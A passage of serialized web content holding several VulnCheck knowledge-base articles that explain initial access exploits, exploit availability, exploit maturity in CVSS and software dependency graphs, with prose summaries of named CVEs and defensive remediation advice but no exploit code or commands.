management teams prioritize their remediation activities. The PoC exploits show how attackers could use a vulnerability to gain initial access. Examples include:",[993,41621,41623],{"id":41622},"beyondtrust-privileged-remote-access-remote-support-cve-2024-12356-and-cve-2025-1094","BeyondTrust Privileged Remote Access & Remote Support CVE-2024-12356 and CVE-2025-1094",[18,41625,41626,41627,41631],{},"These vulnerabilities allow unauthenticated remote code execution (RCE) in BeyondTrust products. 
In this ",[47,41628,2505],{"href":41629,"rel":41630},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-02-28",[51],", researchers developed pcaps to demonstrate potential risk impact of CVE-2025-1094, which was not listed in the Cybersecurity & Infrastructure Security Agency (CISA) Known Exploited Vulnerability (KEV) list.",[993,41633,41635],{"id":41634},"cve-2025-33028-winzip-incorrect-propagation-of-ads-local-exploit","CVE-2025-33028: WinZip Incorrect Propagation of ADS Local Exploit",[18,41637,41638,41639,41644],{},"Researchers showed that attackers targeting ",[47,41640,41643],{"href":41641,"rel":41642},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-05-09#cve-2025-33028-winzip-incorrect-propagation-of-ads-local-exploit",[51],"vulnerable versions of WinZip"," are able to exploit this flaw to execute malicious MS Word documents or batch files.",[993,41646,41648],{"id":41647},"cve-2024-6235-citrix-netscaler-console-session-id-disclosure","CVE-2024-6235: Citrix NetScaler Console Session ID Disclosure",[18,41650,41651,41656],{},[47,41652,41655],{"href":41653,"rel":41654},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-05-02",[51],"This vulnerability"," has an Exploit Prediction Scoring System (EPSS) score in the 90th percentile, with NetScaler being mentioned eight times in the CISA KEV. This PoC leaks a session key and creates a super admin account to show how attackers could compromise systems.",[993,41658,41660],{"id":41659},"cve-2025-24054-windows-11-ntlmv2-hash-leak","CVE-2025-24054: Windows 11 NTLMv2 Hash Leak",[18,41662,41663,41668],{},[47,41664,41667],{"href":41665,"rel":41666},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-04-25",[51],"This vulnerability,"," listed in the CISA KEV, is triggered when a user extracts or previews a ZIP archive containing a malicious file. 
The PoC generates malicious payloads and demonstrates how to catch the SMB authentication request.",[993,41670,41672],{"id":41671},"cve-2024-48887-fortiswitch-unauthenticated-admin-password-reset","CVE-2024-48887: FortiSwitch Unauthenticated Admin Password Reset",[18,41674,41675,41679],{},[47,41676,41655],{"href":41677,"rel":41678},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-04-18",[51]," enables attackers to create arbitrary unauthenticated user password resets that grant a full account takeover. The PoC included an exploit, pcaps, Suricata & Snort rules, Greynoise, FOFA, Shodan, Censys, and ZoomEye queries.",[61,41681,41683],{"id":41682},"what-are-examples-of-zero-day-exploit-attacks","What are Examples Of Zero-Day Exploit Attacks?",[18,41685,41686],{},"A zero-day exploit occurs when threat actors use a previously unknown software vulnerability to gain unauthorized access to and control over systems before the manufacturer can deploy a security update. Zero-day exploits can be especially useful for initial access, as defenders have few options for remediation and there may be less security inspection than typical for a known vulnerability.",[18,41688,14080,41689,41694],{},[47,41690,41693],{"href":41691,"rel":41692},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2024",[51],"first half of 2024",", researchers identified 53 zero-day vulnerabilities with exploitation evidence available at or before anyone publicly disclosed the vulnerabilities. 
Examples include:",[993,41696,41698],{"id":41697},"four-faith-industrial-router-cve-2024-12856","Four-Faith Industrial Router CVE-2024-12856",[18,41700,41701,41702,41707],{},"Prior to publishing the vulnerability, ",[47,41703,41706],{"href":41704,"rel":41705},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ffour-faith-cve-2024-12856?ref=blog.xlab.qianxin.com",[51],"a post-authentication vulnerability"," affecting these routers enabled attackers to leverage the device’s default credentials and engage in unauthenticated remote command injections. When modifying the device’s system time, attackers could use an OS command injection.",[993,41709,41711],{"id":41710},"cisco-ios-xe-implants-cve-2023-20198","Cisco IOS XE Implants CVE-2023-20198",[18,41713,41701,41714,41719],{},[47,41715,41718],{"href":41716,"rel":41717},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fcisco-implants",[51],"an authentication bypass vulnerability"," affecting switches and routers enabled attackers to install implants on them. With privileged access, attackers could likely monitor network traffic, pivot into protected networks, and perform various man-in-the-middle (MitM) attacks.",[61,41721,41723],{"id":41722},"how-do-attackers-choose-a-target","How Do Attackers Choose a Target?",[18,41725,41726,41727,41732],{},"Attackers typically engage in reconnaissance about an organization’s people and technology stack to gather information about vulnerabilities, network misconfigurations, and key personnel. They may choose to focus on a specific industry where organizations manage high-value sensitive data, like healthcare or financial services. They may also look to specific geographic regions if they are motivated politically. 
Alternately, tools such as ",[47,41728,41731],{"href":41729,"rel":41730},"https:\u002F\u002Fwww.shodan.io\u002F",[51],"Shodan"," or honey pots allow attackers to identify opportunistic targets.",[61,41734,41736],{"id":41735},"what-are-some-initial-access-exploit-mitigation-steps-organizations-can-take","What are Some Initial Access Exploit Mitigation Steps Organizations Can Take?",[18,41738,41739],{},"Many cybersecurity best practices are focused on stopping or limiting the impact of initial access. To mitigate the risk that attackers can gain or weaponize initial access, organizations should consider the following security controls:",[22,41741,41742,41748,41754,41760,41766],{},[25,41743,41744,41747],{},[295,41745,41746],{},"Multi-factor authentication (MFA)",": Leveraging authenticator apps or security challenge prompts at authentication time helps to ensure users are who they say they are when accessing critical resources.",[25,41749,41750,41753],{},[295,41751,41752],{},"Principle of least privilege:"," Limit user access as precisely as possible so users can access only the resources necessary to complete their job functions to mitigate risks of unauthorized users moving laterally across systems.",[25,41755,41756,41759],{},[295,41757,41758],{},"Secure software configurations",": Change default credentials on commercial products and limit software and hardware functionality.",[25,41761,41762,41765],{},[295,41763,41764],{},"Vulnerability management",": Identify vulnerabilities across devices, software, and firmware then apply security updates or implement compensating controls as quickly as possible.",[25,41767,41768,41771],{},[295,41769,41770],{},"Detection and Response",": Implement detections, like Suricata or YARA rules, and leverage detection and response systems across the network, endpoint, and cloud to alert security teams about potential 
incidents.",[61,41773,41775],{"id":41774},"vulncheck-exploit-intelligence-insight-into-ongoing-and-potential-vulnerability-exploits","VulnCheck Exploit Intelligence: Insight Into Ongoing and Potential Vulnerability Exploits",[18,41777,41778],{},"As the organization’s attack surface expands, identifying anomalous activity and malicious activity becomes more difficult. With VulnCheck Exploit & Vulnerability intelligence, security and vulnerability remediation teams gain access to a breadth of data that incorporates the NIST National Vulnerability Database (NVD) and CISA Known Exploited Vulnerability (KEV) catalog coupled with exploit intelligence that provides insight into real-world attacker activity.",[18,41780,41781],{},"With our Exploit Intelligence that provides initial access intelligence, organizations can rapidly improve their vulnerability prioritization and remediation capabilities with data about public and commercial exploits, including reported exploited, weaponized exploits, threat actors attributed with the vulnerability, ransomware campaigns using the vulnerability, and botnets attributed to the vulnerability.",{"title":219,"searchDepth":220,"depth":220,"links":41783},[41784,41785,41792,41796,41797,41798],{"id":41534,"depth":220,"text":41535},{"id":41609,"depth":220,"text":41610,"children":41786},[41787,41788,41789,41790,41791],{"id":41622,"depth":1266,"text":41623},{"id":41634,"depth":1266,"text":41635},{"id":41647,"depth":1266,"text":41648},{"id":41659,"depth":1266,"text":41660},{"id":41671,"depth":1266,"text":41672},{"id":41682,"depth":220,"text":41683,"children":41793},[41794,41795],{"id":41697,"depth":1266,"text":41698},{"id":41710,"depth":1266,"text":41711},{"id":41722,"depth":220,"text":41723},{"id":41735,"depth":220,"text":41736},{"id":41774,"depth":220,"text":41775},"Exploit Intel 101 - Understanding Initial Access 
Exploits",{"slug":41801},"understanding-initial-access-exploits","\u002Fblog\u002Funderstanding-initial-access-exploits",{"title":41498,"description":41799},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-initial-access-exploits",[41494],"3OKwZX4s0QGSGEHkZBS_T_T6tGyk-V3CrLP3W2csyq4",{"id":41809,"title":41810,"articles":7,"authors":41811,"body":41813,"date":42074,"description":42075,"extension":234,"image":7,"link":7,"meta":42076,"navigation":237,"path":42078,"seo":42079,"series":42080,"stem":42081,"subtype":7,"tags":42082,"__hash__":42083},"blog\u002Fblog\u002Funderstanding-exploit-availability.md","Understanding Exploit Availability",[41812],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":41814,"toc":42061},[41815,41817,41831,41835,41838,41876,41879,41882,41886,41895,41909,41912,41932,41936,41939,41942,41961,41964,41975,41979,41982,41985,42005,42008,42019,42023,42026,42030,42033,42037,42040,42044,42047,42051,42054,42058],[18,41816,41227],{},[22,41818,41819,41822,41825,41828],{},[25,41820,41821],{},"The definition of exploitability and the factors that affect a vulnerability’s exploitability",[25,41823,41824],{},"The definition of exploit availability",[25,41826,41827],{},"What the Known Exploited Vulnerability (KEV) catalog is",[25,41829,41830],{},"Exploit availability’s importance and challenges that security teams face",[61,41832,41834],{"id":41833},"what-is-the-meaning-of-exploitability","What is the Meaning of Exploitability?",[18,41836,41837],{},"Exploitability refers to the potential or likelihood that threat actors can use a vulnerability to compromise systems, applications, or networks. 
When assessing exploitability, security professionals consider whether attackers can easily use the vulnerability to achieve their objectives, accounting for factors like:",[22,41839,41840,41846,41852,41858,41864,41870],{},[25,41841,41842,41845],{},[295,41843,41844],{},"Complexity of system architecture",": Complex systems require more advanced attacker expertise, influencing ease of exploitation.",[25,41847,41848,41851],{},[295,41849,41850],{},"Existence of Exploit Code",": Verified and popular exploit code, especially if linked extensively in common repositories, increases the chances of exploitation.",[25,41853,41854,41857],{},[295,41855,41856],{},"Threat Actor Skill Level",": The expert status of threat actors can determine how vulnerabilities are exploited.",[25,41859,41860,41863],{},[295,41861,41862],{},"Exploit Timelines",": The median time from disclosure to exploitation may vary, affected by exploit difficulty and value.",[25,41865,41866,41869],{},[295,41867,41868],{},"Network Tools and Automated Agents",": These tools can enhance an exploit's spread, increasing vulnerability scores.",[25,41871,41872,41875],{},[295,41873,41874],{},"Potential Impact:"," The harm attackers can cause if they exploit a vulnerability, such as remote code execution or zero-day exploitation.",[18,41877,41878],{},"The Common Vulnerability Scoring System (CVSS), supported by the National Vulnerability Database (NVD), uses exploitability as one of the qualitative measures for vulnerability severity.",[18,41880,41881],{},"Vulnerability and patch management teams use exploitability as one way to help them prioritize their remediation activities.",[61,41883,41885],{"id":41884},"what-is-exploit-availability","What is Exploit Availability?",[18,41887,41888,41889,41894],{},"Exploit Availability refers to the existence and accessibility of exploit code for identified vulnerabilities. 
Within ",[47,41890,41893],{"href":41891,"rel":41892},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fv4-0\u002Fcvss-v40-specification.pdf",[51],"CVSS 4.0",", the Threat Metrics incorporate the following publicly available information when adjusting a vulnerability’s severity:",[22,41896,41897,41903],{},[25,41898,41899,41902],{},[295,41900,41901],{},"Availability of proof-of-concept code",": Publicly available exploit code with sufficient technical details that indicate attackers may be able to exploit the vulnerability, even without knowledge of reported attempts or publicly available solutions to simplify attempts.",[25,41904,41905,41908],{},[295,41906,41907],{},"Active exploitation:"," Reports of attempted or successful attacks against the vulnerability with solutions that simplify the exploit attempts, like publicly or privately available exploit toolkits.",[18,41910,41911],{},"Understanding exploit availability helps prioritize remediation efforts, especially when dealing with zero-day and n-day vulnerabilities. 
Exploit availability can fall into three different categories:",[22,41913,41914,41920,41926],{},[25,41915,41916,41919],{},[295,41917,41918],{},"Publicly available",": Publicly accessible exploit",[25,41921,41922,41925],{},[295,41923,41924],{},"Commercially available",": Exploit available for purchase",[25,41927,41928,41931],{},[295,41929,41930],{},"Allegedly privately available",": Claims or rumors that an exploit is available privately",[61,41933,41935],{"id":41934},"what-is-the-known-exploited-vulnerability-kev-catalog","What is the Known Exploited Vulnerability (KEV) Catalog?",[18,41937,41938],{},"The Known Exploited Vulnerability (KEV) Catalog lists vulnerabilities that have assigned Common Vulnerabilities and Exposures (CVE) IDs with confirmed evidence of active exploitation by threat actors.",[18,41940,41941],{},"The KEV Catalog’s key features include:",[22,41943,41944,41949,41955],{},[25,41945,41946,41948],{},[295,41947,40596],{},": Identifying and tracking CVE IDs provided by the CVE Program, which is sponsored by CISA and operated by The MITRE Corporation.",[25,41950,41951,41954],{},[295,41952,41953],{},"Active Exploitation",": Each entry in the catalog has reliable evidence of being exploited in the wild, highlighting n-day vulnerabilities and zero-day exploitation.",[25,41956,41957,41960],{},[295,41958,41959],{},"Remediation Prioritization",": The catalog prioritizes those vulnerabilities that have clear remediation actions, such as updates provided by software vendors.",[18,41962,41963],{},"Security, vulnerability management, and patch management teams can use the KEV catalog to:",[22,41965,41966,41969,41972],{},[25,41967,41968],{},"Prioritize vulnerability management activities",[25,41970,41971],{},"Focus remediation and monitoring on actively exploited vulnerabilities",[25,41973,41974],{},"Optimize patching strategies or compensating control implementations to mitigate potential 
impacts",[61,41976,41978],{"id":41977},"why-is-exploit-availability-important","Why is Exploit Availability Important?",[18,41980,41981],{},"Exploit availability indicates whether exploit code for a specific vulnerability is accessible in public, commercial, or private formats, impacting the likelihood that threat actors will target the vulnerability to achieve their objectives.",[18,41983,41984],{},"Some benefits of using Exploit Availability as part of prioritizing vulnerability remediation include:",[22,41986,41987,41993,41999],{},[25,41988,41989,41992],{},[295,41990,41991],{},"Increased likelihood of exploitation",": While the existence of exploit code can increase the chances of successful exploitation, many vulnerabilities with exploit code remain unused so this should be only one factor used when prioritizing activities.",[25,41994,41995,41998],{},[295,41996,41997],{},"Early threat indicator",": The availability of exploits provides insight into threat actor thought processes and evolving attack methodologies, so security teams can proactively fortify defenses.",[25,42000,42001,42004],{},[295,42002,42003],{},"Vulnerability Management:"," While exploit availability aids in assessing the security posture and prioritizing remediation, vulnerability and patch management teams should prioritize active exploitation targeting specific entities.",[18,42006,42007],{},"When determining the potential impact that an available exploit can have, security teams should also consider:",[22,42009,42010,42013,42016],{},[25,42011,42012],{},"Attackers are more likely to use a publicly available exploit, making these vulnerabilities the highest priority.",[25,42014,42015],{},"Attackers often use commercial exploits for targeted attacks, so additional threat intelligence surrounding real-world attacks using the vulnerability can help understand whether the organization is more or less likely to be a victim.",[25,42017,42018],{},"Attackers often have limited access to and use of 
privately available exploits, influencing the risk and harm to individual organizations.",[61,42020,42022],{"id":42021},"what-challenges-do-security-teams-face-when-trying-to-understand-exploit-availability-for-their-environments","What Challenges do Security Teams Face When Trying to Understand Exploit Availability for Their Environments?",[18,42024,42025],{},"Security, vulnerability management, and patch management teams struggle to appropriately incorporate Exploit Availability into their vulnerability prioritization strategies.",[993,42027,42029],{"id":42028},"lack-of-comprehensive-exploit-intelligence","Lack of Comprehensive Exploit Intelligence",[18,42031,42032],{},"While the KEV Catalog provides information about known exploits, information about proof-of-concept, commercially available, and privately available exploits is difficult to find. The information is often dispersed across different threat actor communication channels, making it more difficult to consolidate all information about available exploits.",[993,42034,42036],{"id":42035},"lack-of-skills","Lack of Skills",[18,42038,42039],{},"Many security teams already struggle with the cybersecurity skills gap, making it more difficult to implement threat research. Without people who can monitor cybercriminal communications, these teams have no way to collect information unless it appears on the clear web.",[993,42041,42043],{"id":42042},"time-consuming-manual-processes","Time-Consuming Manual Processes",[18,42045,42046],{},"When security teams have the people who can monitor these communications, the process is time-consuming. Often, organizations need to dedicate a full time security analyst to infiltrate these communications channels or limit their research which leads to information gaps. 
These time-consuming processes mean that security teams often only receive information about exploit availability after threat actors have successfully used the vulnerability in an attack against the organization or someone else.",[993,42048,42050],{"id":42049},"lack-of-specialized-tools","Lack of Specialized Tools",[18,42052,42053],{},"While some security teams have dark web monitoring tools, these technologies often collect a wide array of threat information. Even when they integrate into the organization’s security information and event management (SIEM) solution, they may not collect comprehensive information focused on vulnerability exploits.",[61,42055,42057],{"id":42056},"vulncheck-exploit-and-vulnerability-intelligence-for-informed-remediation-prioritization","VulnCheck: Exploit and Vulnerability Intelligence for Informed Remediation Prioritization",[18,42059,42060],{},"With VulnCheck, organizations gain the insights they need into exploit availability so they can appropriately prioritize remediation activities. VulnCheck is an average of 14 days faster than the NVD and over 1 month faster than CISA KEV at reporting vulnerabilities, and it provides the industry’s largest collection of exploit availability threat intelligence. 
Our platform provides complete exploitation timelines covering vulnerability discovery and publication, discovery of exploit availability and exploitation, and vulnerability remediation publication.",{"title":219,"searchDepth":220,"depth":220,"links":42062},[42063,42064,42065,42066,42067,42073],{"id":41833,"depth":220,"text":41834},{"id":41884,"depth":220,"text":41885},{"id":41934,"depth":220,"text":41935},{"id":41977,"depth":220,"text":41978},{"id":42021,"depth":220,"text":42022,"children":42068},[42069,42070,42071,42072],{"id":42028,"depth":1266,"text":42029},{"id":42035,"depth":1266,"text":42036},{"id":42042,"depth":1266,"text":42043},{"id":42049,"depth":1266,"text":42050},{"id":42056,"depth":220,"text":42057},"2025-05-21","Exploit Intel 101 - Understanding Exploit Availability",{"slug":42077},"understanding-exploit-availability","\u002Fblog\u002Funderstanding-exploit-availability",{"title":41810,"description":42075},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-exploit-availability",[41494],"aBFfXivjKr0LQgm7_LyEhiVdn8Rn-SZL51fEm4Zs5Yw",{"id":42085,"title":42086,"articles":7,"authors":42087,"body":42089,"date":42074,"description":42349,"extension":234,"image":7,"link":7,"meta":42350,"navigation":237,"path":42352,"seo":42353,"series":42354,"stem":42355,"subtype":7,"tags":42356,"__hash__":42357},"blog\u002Fblog\u002Funderstanding-exploit-maturity.md","Understanding Exploit Maturity",[42088],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42090,"toc":42336},[42091,42093,42113,42116,42119,42122,42125,42151,42154,42156,42160,42163,42166,42191,42195,42198,42201,42227,42231,42234,42238,42241,42261,42265,42268,42271,42291,42294,42298,42308,42328,42332,42334],[18,42092,41227],{},[22,42094,42095,42098,42101,42104,42107,42110],{},[25,42096,42097],{},"Definition of exploit maturity",[25,42099,42100],{},"Differences between exploit maturity and proof of concept exploit",[25,42102,42103],{},"Relationship between exploit 
maturity and vulnerability severity",[25,42105,42106],{},"Relationship between exploit maturity and vulnerability criticality",[25,42108,42109],{},"Impact of exploit maturity on the risk a vulnerability poses",[25,42111,42112],{},"How vulnerability management teams can use exploit maturity when prioritizing remediation actions",[18,42114,42115],{},"Exploit maturity is a metric that reflects the current state of exploit techniques for a specific vulnerability, the availability of exploit code, and active exploitation in the wild. Originally introduced as a temporal metric in the Common Vulnerability Scoring System (CVSS) v3.0, exploit maturity is now considered a threat metric in CVSS v4.0.",[18,42117,42118],{},"This metric considers an exploit’s lifecycle from initial vulnerability discovery through threat actors’ ability to weaponize the vulnerability to gain unauthorized access or damage an IT system.",[18,42120,42121],{},"For example, while a theoretical exploit indicates that malicious actors could conceivably use a vulnerability to help achieve their objectives, easy-to-use exploit code available on the dark web means that less sophisticated or technical cybercriminals can deploy attacks more easily.",[18,42123,42124],{},"The exploit maturity metric includes four categories:",[22,42126,42127,42133,42139,42145],{},[25,42128,42129,42132],{},[295,42130,42131],{},"Not defined",": Default metric indicating a lack of reliable threat intelligence.",[25,42134,42135,42138],{},[295,42136,42137],{},"Proof of Concept:"," Threat intelligence indicates that theoretical exploit code is available but no reported attempts or publicly available solutions to simplify attempts exist.",[25,42140,42141,42144],{},[295,42142,42143],{},"Attacked:"," Threat intelligence indicates either known attempted or successful attacks already target the vulnerability, or tools to enable exploits are known to exist, such as exploit kits being sold on the dark 
web.",[25,42146,42147,42150],{},[295,42148,42149],{},"Unreported:"," Available threat intelligence indicates no publicly available proof-of-concept code, no reported knowledge of exploit attempts, and no publicly available solutions that simplify attempts to exploit the vulnerability.",[18,42152,42153],{},"As the CVSS does not populate the exploit maturity values, organizations need sources of exploit intelligence that incorporate this information so they can implement the appropriate detections and remediation strategies.",[61,42155],{"id":219},[61,42157,42159],{"id":42158},"what-is-the-difference-between-exploit-maturity-and-a-proof-of-concept-exploit","What is the Difference Between Exploit Maturity and a Proof of Concept Exploit?",[18,42161,42162],{},"Proof of concept (PoC) is one stage of an exploit’s maturity. An exploit PoC is a preliminary demonstration showing how attackers could exploit the vulnerability, even if threat actors have not actually engaged in hostile activity in the wild.",[18,42164,42165],{},"The four primary differences between exploit maturity and exploit PoC are:",[22,42167,42168,42174,42180,42186],{},[25,42169,42170,42173],{},[295,42171,42172],{},"Definition",": Exploit maturity ranges from no exploit to fully weaponized exploit while exploit PoC only demonstrates an initial possibility.",[25,42175,42176,42179],{},[295,42177,42178],{},"Objective",": Exploit maturity enables organizations to prioritize their strategies based on attackers using a vulnerability while exploit PoC indicates a potential risk that may or may not come to fruition.",[25,42181,42182,42185],{},[295,42183,42184],{},"Stage in development",": Exploit maturity is a broader spectrum of threats and risks while exploit PoC is only an initial state prior to actual use.",[25,42187,42188,42190],{},[295,42189,32527],{},": Exploit maturity helps assess risk and potential real-world impact while exploit PoC validates a hypothetical way that attackers could use the vulnerability 
in an attack.",[61,42192,42194],{"id":42193},"how-does-exploit-maturity-impact-a-vulnerabilitys-severity","How Does Exploit Maturity Impact a Vulnerability’s Severity?",[18,42196,42197],{},"When the CVSS moved exploit maturity from a temporal to a threat metric, it highlighted the value that these insights provide when assessing a vulnerability’s severity. The threat metrics adjust a vulnerability’s severity by considering attackers’ ability to and ease of using the vulnerability over time to successfully achieve their objectives.",[18,42199,42200],{},"Organizations that consider exploit maturity’s relationship to vulnerability severity typically address the following:",[22,42202,42203,42209,42215,42221],{},[25,42204,42205,42208],{},[295,42206,42207],{},"Risk Perception",": Higher exploit maturity can correlate to greater exploitability which increases the perceived threat levels.",[25,42210,42211,42214],{},[295,42212,42213],{},"Actual Risk Impact",": Mature exploit code available publicly or privately allows less sophisticated and technical attackers to exploit the vulnerability, expanding the potential for harm to systems.",[25,42216,42217,42220],{},[295,42218,42219],{},"Severity Rating",": Vulnerabilities with mature exploit code receive higher severity ratings since real-world exploitation is more likely.",[25,42222,42223,42226],{},[295,42224,42225],{},"Threat Intelligence",": Weaponized and actively used exploits should be part of the threat intelligence that the security team gathers.",[61,42228,42230],{"id":42229},"how-does-exploit-maturity-impact-a-vulnerabilitys-criticality","How Does Exploit Maturity Impact a Vulnerability's Criticality?",[18,42232,42233],{},"The CVSS scoring system defines a critical vulnerability as one with a score between 9.0 and 10.0 based on its combined Base, Threat, and Environmental scores. The Threat score incorporates exploit maturity, ultimately increasing the overall CVSS score. 
For example, vulnerabilities that fall into the Attacked exploit maturity category likely have a higher overall CVSS score compared to similarly situated vulnerabilities that have an exploit maturity level defined as Unreported.",[61,42235,42237],{"id":42236},"how-does-exploit-maturity-impact-the-risk-a-vulnerability-poses-to-an-it-environment","How Does Exploit Maturity Impact the Risk a Vulnerability Poses to an IT Environment?",[18,42239,42240],{},"Security and vulnerability management teams should consider exploit maturity as a factor when determining the risk a vulnerability poses to their environments. As exploit techniques become more refined and accessible, the risk associated with a vulnerability can increase significantly. Some key considerations include:",[22,42242,42243,42249,42255],{},[25,42244,42245,42248],{},[295,42246,42247],{},"Exploit code availability",": If attackers are actively exploiting the vulnerability in the wild, they are also likely targeting the technology’s customer base.",[25,42250,42251,42254],{},[295,42252,42253],{},"Operationalization of the exploit",": If the exploit is available for private or public sale, then more malicious actors can compromise systems that incorporate the technology and the IT environment’s risk increases.",[25,42256,42257,42260],{},[295,42258,42259],{},"Current security controls",": To exploit a vulnerability, attackers need to be able to reach it within the context of the organization’s current security and system architecture so compensating controls, like network segmentation, may decrease risk.",[61,42262,42264],{"id":42263},"how-does-exploit-maturity-help-vulnerability-management-teams-prioritize-remediation-efforts","How Does Exploit Maturity Help Vulnerability Management Teams Prioritize Remediation Efforts?",[18,42266,42267],{},"Exploit maturity significantly enhances vulnerability management by enabling teams to prioritize their remediation actions more effectively.",[18,42269,42270],{},"Some key 
benefits of using exploit maturity when trying to prioritize vulnerability remediation include:",[22,42272,42273,42279,42285],{},[25,42274,42275,42278],{},[295,42276,42277],{},"Efficient Resource Allocation:"," Filtering vulnerabilities by exploit maturity allows teams to dedicate efforts towards addressing those with active threats that pose increased data breach risks.",[25,42280,42281,42284],{},[295,42282,42283],{},"Rapid Identification:"," Quickly ascertaining vulnerabilities with known exploits enables organizations to address critical issues faster.",[25,42286,42287,42290],{},[295,42288,42289],{},"Informed Decision-Making:"," The inclusion of Exploit Code Maturity within the CVSS Threat Metrics guides prioritization efforts by offering an assessment of present exploitability which correlates to potential increased risk.",[61,42292],{"id":42293},"_1",[61,42295,42297],{"id":42296},"how-does-exploit-intelligence-incorporate-exploit-maturity","How Does Exploit Intelligence Incorporate Exploit Maturity?",[61,42299,42301,42302,42307],{"id":42300},"as-the-number-of-vulnerabilities-continues-to-grow-security-and-vulnerability-remediation-teams-need-information-about-the-ones-that-malicious-actors-are-most-likely-to-use-in-an-attack-attackers-exploit-or-are-likely-to-exploit-only-about-2-3-of-disclosed-vulnerabilities-exploit-intelligence-incorporates-a-vulnerabilitys-technical-information-and-exploit-maturity-then-correlates-it-with-additional-context-like","As the number of vulnerabilities continues to grow, security and vulnerability remediation teams need information about the ones that malicious actors are most likely to use in an attack. Attackers exploit or are likely to exploit only about 2-3% of disclosed vulnerabilities. 
",[47,42303,42306],{"href":42304,"rel":42305},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fexploit-intelligence",[51],"Exploit Intelligence"," incorporates a vulnerability’s technical information and exploit maturity then correlates it with additional context like",[22,42309,42310,42316,42322],{},[25,42311,42312,42315],{},[295,42313,42314],{},"Exploit type",": Adversary objectives, like gaining initial access, stealing sensitive information, or disrupting business operations.",[25,42317,42318,42321],{},[295,42319,42320],{},"Exploit timelines",": An exploit’s evolution from PoC to available publicly or privately to help predict a vulnerability’s future potential impact.",[25,42323,42324,42327],{},[295,42325,42326],{},"Threat intelligence:"," Information about known threats, like ransomware families, botnets, and named threat actors, for actionable insights that help prioritize next steps.",[61,42329,42331],{"id":42330},"vulncheck-exploit-intelligence-breadth-and-depth-of-vulnerability-and-exploit-maturity-information","VulnCheck Exploit Intelligence: Breadth and Depth of Vulnerability and Exploit Maturity Information",[18,42333,41467],{},[18,42335,41470],{},{"title":219,"searchDepth":220,"depth":220,"links":42337},[42338,42339,42340,42341,42342,42343,42344,42345,42346,42348],{"id":219,"depth":220,"text":219},{"id":42158,"depth":220,"text":42159},{"id":42193,"depth":220,"text":42194},{"id":42229,"depth":220,"text":42230},{"id":42236,"depth":220,"text":42237},{"id":42263,"depth":220,"text":42264},{"id":42293,"depth":220,"text":219},{"id":42296,"depth":220,"text":42297},{"id":42300,"depth":220,"text":42347},"As the number of vulnerabilities continues to grow, security and vulnerability remediation teams need information about the ones that malicious actors are most likely to use in an attack. Attackers exploit or are likely to exploit only about 2-3% of disclosed vulnerabilities. 
Exploit Intelligence incorporates a vulnerability’s technical information and exploit maturity then correlates it with additional context like",{"id":42330,"depth":220,"text":42331},"Exploit Intel 101 - Understanding Exploit Maturity",{"slug":42351},"understanding-exploit-maturity","\u002Fblog\u002Funderstanding-exploit-maturity",{"title":42086,"description":42349},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-exploit-maturity",[41494],"jJ4MVcn7-JJGfrn0N7iyiJgLH1IZzKXKsXLfxhy2i_8",{"id":42359,"title":42360,"articles":7,"authors":42361,"body":42363,"date":42074,"description":42581,"extension":234,"image":7,"link":7,"meta":42582,"navigation":237,"path":42584,"seo":42585,"series":42586,"stem":42587,"subtype":7,"tags":42588,"__hash__":42589},"blog\u002Fblog\u002Funderstanding-software-dependency-graphs.md","Understanding Software Dependency Graphs",[42362],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42364,"toc":42558},[42365,42368,42382,42386,42389,42392,42412,42416,42419,42423,42426,42430,42433,42437,42440,42444,42447,42451,42454,42458,42461,42465,42468,42472,42475,42479,42482,42486,42489,42492,42495,42499,42502,42506,42515,42519,42522,42533,42537,42540,42551,42555],[18,42366,42367],{},"This knowledge base article will support a fundamental understanding of:",[22,42369,42370,42373,42376,42379],{},[25,42371,42372],{},"The definition and key features of a software dependency graph",[25,42374,42375],{},"Uses for software dependency graphs",[25,42377,42378],{},"Why developers struggle with generating accurate software dependency graphs",[25,42380,42381],{},"Best practices for building accurate dependency graphs",[61,42383,42385],{"id":42384},"what-is-a-software-dependency-graph","What is a Software Dependency Graph?",[18,42387,42388],{},"A software dependency graph visualizes the complex web of a software system’s components, including modules, libraries, and frameworks. 
By representing these as nodes, the dependency graph shows connections between them so software developers can see and understand interactions between these different elements.",[18,42390,42391],{},"Typically, dependency graphs use one of the following visual representation formats:",[22,42393,42394,42400,42406],{},[25,42395,42396,42399],{},[295,42397,42398],{},"Dependency matrix",": Grid-like representation displaying nodes across rows and columns to help identify circular dependencies where a node depends on itself.",[25,42401,42402,42405],{},[295,42403,42404],{},"Adjacency list",": List format with directed connections between entities identified under each node to detail dependencies across software packages or modules and understand component interlinking.",[25,42407,42408,42411],{},[295,42409,42410],{},"Linked nodes",": Visualization of linked nodes that connects them using directed edges for insight into an application’s architecture and potential conflicts, reducing the number of circular relationships.",[61,42413,42415],{"id":42414},"why-is-it-important-to-understand-software-dependencies","Why is it Important to Understand Software Dependencies?",[18,42417,42418],{},"Dependencies can introduce potential issues or even cause system failures if not managed properly. When developers add new dependencies, conflicts with existing components might arise, leading to compatibility issues. Effectively managing dependencies also helps reduce vulnerabilities that attackers can use to compromise systems and networks. Key aspects include:",[993,42420,42422],{"id":42421},"transparency-across-third-party-components-and-libraries","Transparency Across Third-party Components and Libraries",[18,42424,42425],{},"Dependency graphs reveal the structure of the different components that developers incorporate into the software. 
